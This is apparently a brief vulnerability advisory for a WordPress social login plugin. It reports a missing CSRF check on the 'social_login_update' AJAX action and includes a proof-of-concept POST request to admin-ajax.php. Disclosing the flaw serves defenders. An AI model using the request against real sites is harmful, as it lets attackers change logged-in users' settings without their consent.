The plugin does not have Cross-Site Request Forgery (CSRF) check when updating user social login option, which could allow attackers to make logged in users do such action on their behalf via a Cross-Site Request Forgery (CSRF) attack.
Proof of Concept
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
action=social_login_update&prop=box_status&id=["facebook","twitter"]